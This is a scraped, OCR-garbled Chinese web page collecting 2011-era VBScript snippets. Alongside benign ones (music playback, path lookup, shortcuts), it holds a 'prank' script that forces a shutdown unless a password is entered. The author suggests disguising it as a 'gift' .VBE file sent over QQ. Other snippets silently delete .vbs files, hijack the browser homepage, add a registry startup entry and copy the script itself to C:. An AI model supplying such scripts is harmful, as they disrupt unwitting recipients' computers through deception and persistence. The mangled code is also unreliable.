VBS脚本常用代码大全2011整理

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

VBS脚本常用经典代码收集于2011年7月2日21:13:37整理

在网上查找资料的时候发现好多经典的vbs 代码,收集起来也为了以后学习。

VBS播放音乐

Dimwmp

Setwmp=CreateObject("WMPlayer.OCX")

wmp.openState

wmp.URL二'想象之中.mp3"

DoUntilwmp.playState=1

WScript.Sleep1000

Loop

比较流行的VBS整人脚本(保存为礼物.VBE”这样就可以通过QQ发送

了)Setshell二CreateObject("WScript.Shell")

shell.run"shutdown-s-t60-c 系统即将关闭.",0

WhileInputBox("请输入答案",”请回答")<>"123"'密码是123

MsgBox"答案在心中…",16+4096'4096是让窗口在最顶层

Wend

shell.run"shutdown-a",0

MsgBox"恭喜",64

修改桌面背景图片

Sphoto二"d:\1.bmp"'输入你自己的BMP路径

Consthkcu=&h80001

Setwmi=GetObject("winmgmts:

stdregprov")wmi.getstringvaluehkcu,"ControlPanel\Desktop","Wallpaper",Spathwmi. setstringvaluehkcu,"ControlPanel\Desktop","TileWallpaper","0"wmi.setstringvaluehk cu,"ControlPanel\Desktop","WallpaperStyle","2"wmi.setdwordvalue

hkcu,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Listvi ewShadow",1

Setwmi=Nothing

Setfso=CreateObject("scripting.filesystemobject")

Setfs=fso.Getfile(Sphoto)

backname=

=fso.GetFileName(Spath)

fs.Copyfso.GetParentFolderName(Spath)&"\",True

=backname

Setfso=Nothing

Setws=CreateObject("wscript.shell")

ws.Run"gpupdate/force",vbhide

ws.Run"RunDll

32.exeUSER

32.DLL,UpdatePerUserSystemParameters"

Setws=Nothing

VBS获取系统安装路径C:

'WINDOWS 路径

先定义这个变量是获取系统安装路径的,然后我们用"strWinDir" 调用这个变量。

SetWshShell=WScript.CreateObject("WScript.Shell")

strWinDir=WshShell.ExpandEnvironmentStrings("%WinDir%")

VBS获取C:

\Program Files 路径

SetWshShell=WScript.CreateObject("WScript.Shell")

strPorDir=WshShell.ExpandEnvironmentStrings("%ProgramFiles%")

VBS获取C:

'Program Files'Com mon Files 路径

SetWshShell=WScript.CreateObject("WScript.Shell")

strCommDir=WshShell.ExpandEnvironmentStrings("%CommonProgramFiles%") 给桌面添加网址快捷方式

SetWshShell=WScript.CreateObject("Wscript.Shell")

strDesktop=WshShell.SpecialFolders("Desktop")

度.In k")oShellL in k.TargetPath二"http:

oShellLink.Description二百度主页”

给收藏夹添加网址

ConstADMINISTRATIVE_TOOLS=6

SetobjShell=CreateObject("Shell.Application")

SetobjFolder=space(ADMINISTRATIVE_TOOLS)

SetobjFolderItem=objFolder.Self

SetobjShell=WScript.CreateObject("WScript.Shell")

strDesktopFld=objFolderItem.Path

度.url")objURLShortcut.TargetPath二"http:

objURLShortcut.Save 删除指定目录指定后缀文件

OnErrorResumeNext

Setfso=CreateObject("Scripting.FileSystemObject")

fso.DeleteFile"C:

\*.vbs",True

Setfso=Nothing

VBS改主页

SetoShell=CreateObject("WScript.Shell")

Explorer\Main\StartPage","http:

VBS加启动项

SetoShell=CreateObject("Wscript.Shell") oShell.RegWrite

"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"VBS 复制自己到 C 盘

Dimfso

Setfso=WScript.CreateObject("Scripting.Filesystemobject")

fso.getfile(wscript.scriptfullname).copy("c:

\cik.vbs")

复制自己到C盘的huan.vbs(复制本vbs目录下的game.exe文件到c盘的

cik.exe)Dimfso

Setfso=WScript.CreateObject("Scripting.Filesystemobject")

fso.getfile("game.exe").copy("c:

相关文档
最新文档